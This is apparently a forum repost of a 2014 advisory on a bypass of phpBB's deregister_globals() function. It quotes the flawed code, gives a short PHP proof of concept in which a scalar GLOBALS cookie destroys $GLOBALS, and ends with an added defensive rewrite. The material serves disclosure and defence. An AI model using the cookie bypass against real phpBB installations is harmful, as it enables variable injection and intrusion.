Nytro Posted November 25, 2014

phpBB <= 3.1.1 deregister_globals() Function Bypass

Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.11.18

When PHP's register_globals configuration directive is set on, phpBB will call the deregister_globals() function, and all global variables registered by PHP will be destroyed. But the deregister_globals() function can be bypassed.

```
$input = array_merge(
    array_keys($_GET),
    array_keys($_POST),
    array_keys($_COOKIE),
    array_keys($_SERVER),
    array_keys($_SESSION),
    array_keys($_ENV),
    array_keys($_FILES)
);

foreach ($input as $varname)
{
    if (isset($not_unset[$varname]))
    {
        // A protected name from any source other than a GLOBALS cookie aborts the request
        if ($varname !== 'GLOBALS' || isset($_GET['GLOBALS']) || isset($_POST['GLOBALS']) || isset($_SERVER['GLOBALS']) || isset($_SESSION['GLOBALS']) || isset($_ENV['GLOBALS']) || isset($_FILES['GLOBALS']))
        {
            exit;
        }
        else
        {
            $cookie = &$_COOKIE;
            while (isset($cookie['GLOBALS']))
            {
                // A scalar GLOBALS cookie leaves the loop here
                if (!is_array($cookie['GLOBALS']))
                {
                    break;
                }
                // ....
            }
        }
    }

    // Still reached with $varname === 'GLOBALS' after the break above
    unset($GLOBALS[$varname]);
}
```

In the above code we see that when the request sets $_COOKIE['GLOBALS'] = 1, $GLOBALS['GLOBALS'] will be destroyed by unset(). This means the $GLOBALS array will be destroyed. This also means you will not be able to use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script, because the binding between the $GLOBALS array and the global symbol table has been broken. All global variables registered by PHP from the $_COOKIE, $_SERVER, $_SESSION, $_ENV, and $_FILES arrays will not be unregistered.

Proof of Concept

```
$_COOKIE['GLOBALS'] = 1;
// Stands in for register_globals: the cookie value is also registered as $ryat
$_COOKIE['ryat'] = $ryat = 'ryat';
deregister_globals();
var_dump($GLOBALS);
var_dump($ryat);
// Writing through $GLOBALS after the call, then checking the real variable
$GLOBALS['ryat'] = 'hi';
var_dump($GLOBALS);
var_dump($ryat);
```

P.S. I had reported the issue to the phpBB developers, but they do not consider this a security issue.

Source: http://80vul.com/phpbb/vul.txt
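The following is an added example, not phpBB's code or its fix and not part of the original post: one way to enforce that a protected name is never handed to unset(), whichever superglobal supplied it, while still letting a stray GLOBALS cookie through without aborting the request. The names `RESERVED_GLOBALS`, `plan_deregister` and `$app_protected` are hypothetical, and the request data is constructed.

```php
<?php
// Added example; RESERVED_GLOBALS and plan_deregister() are hypothetical names.

// Names that must never be removed from the global symbol table.
const RESERVED_GLOBALS = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_SERVER',
                          '_SESSION', '_ENV', '_FILES', '_REQUEST'];

/**
 * Decide what a deregister routine may unset. Pure function: it only reads
 * the arrays it is given and returns a plan; it never touches $GLOBALS.
 *
 * $sources maps a superglobal name ('_GET', '_COOKIE', ...) to its contents.
 * $app_protected lists application variables that must also survive.
 */
function plan_deregister(array $sources, array $app_protected = []): array
{
    $protected = array_flip(array_merge(RESERVED_GLOBALS, $app_protected));
    $plan = ['reject' => false, 'unset' => [], 'skipped' => []];

    foreach ($sources as $source => $values) {
        foreach (array_keys($values) as $name) {
            $name = (string) $name; // numeric keys come back as integers
            if (!isset($protected[$name])) {
                $plan['unset'][$name] = true; // ordinary registered variable
                continue;
            }
            // A protected name is never unset, whatever its source or value type.
            $plan['skipped'][] = "$source:$name";
            // Only a cookie may carry one without aborting the request,
            // so a leftover GLOBALS cookie cannot lock a user out.
            if ($source !== '_COOKIE') {
                $plan['reject'] = true;
            }
        }
    }
    $plan['unset'] = array_keys($plan['unset']);
    return $plan;
}

// Constructed request data mirroring the proof of concept in the post.
$plan = plan_deregister([
    '_GET'    => ['page' => '1'],
    '_COOKIE' => ['GLOBALS' => 1, 'ryat' => 'ryat'],
]);
echo json_encode($plan, JSON_PRETTY_PRINT), "\n";
```

A caller would exit when `reject` is true and otherwise unset only the names listed under `unset`, so `$GLOBALS['GLOBALS']` is left alone even when the cookie value is a scalar.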